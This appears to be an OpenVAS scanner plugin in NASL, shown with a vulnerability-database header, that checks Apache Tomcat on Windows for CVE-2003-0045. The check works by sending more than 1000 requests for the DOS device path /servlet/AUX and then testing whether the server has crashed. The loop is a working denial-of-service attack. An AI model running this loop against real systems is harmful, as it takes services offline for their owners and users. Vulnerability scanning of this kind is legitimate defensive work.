Tomcat servlet engine MS/DOS device names denial of service

2005-11-0300:00:00

plugins.openvas.org

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

6.6 Medium

AI Score

Confidence

Low

0.004 Low

EPSS

Percentile

72.0%

JSON

It was possible to freeze or crash Windows or the web server
by reading a thousand of times a MS/DOS device through Tomcat servlet engine, using a file name
like /examples/servlet/AUX.

# SPDX-FileCopyrightText: 2002 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

# See also script 10930 http_w98_devname_dos.nasl

CPE = "cpe:/a:apache:tomcat";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11150");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2003-0045");
  script_name("Tomcat servlet engine MS/DOS device names denial of service");
  script_category(ACT_KILL_HOST);
  script_copyright("Copyright (C) 2002 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("gb_apache_tomcat_consolidation.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 8080);
  script_mandatory_keys("apache/tomcat/http/detected", "Host/runs_windows");

  script_tag(name:"solution", value:"Upgrade your Apache Tomcat web server to version 4.1.10.");

  script_tag(name:"summary", value:"It was possible to freeze or crash Windows or the web server
  by reading a thousand of times a MS/DOS device through Tomcat servlet engine, using a file name
  like /examples/servlet/AUX.");

  script_tag(name:"impact", value:"A cracker may use this flaw to make your system crash
  continuously, preventing you from working properly.");

  script_tag(name:"affected", value:"Apache Tomcat 3.3

  Apache Tomcat 4.0.4

  All versions prior to 4.1.x may be affected as well.

  Apache Tomcat 4.1.10 (and probably higher) is not affected.

  Microsoft Windows 2000

  Microsoft Windows NT may be affected as well.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_probe");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );

if( http_is_dead( port:port ) ) exit( 0 );
soc = http_open_socket( port );
if( ! soc ) exit( 0 );

start_denial();

# We should know where the servlets are
url = "/servlet/AUX";
req = http_get( item:url, port:port );

for( i = 0; i <= 1000; i++ ) {

  send( socket:soc, data:req );
  http_close_socket( soc );
  soc = http_open_socket( port );
  if( ! soc ) {
    sleep( 1 );
    soc = http_open_socket( port );
    if( ! soc )
      break;
  }
}

if( soc ) http_close_socket( soc );
alive = end_denial();

if( ! alive || http_is_dead( port:port ) ) {
  report = http_report_vuln_url( port:port, url:url );
  security_message( port:port, data:report );
  exit( 0 );
}

exit( 99 );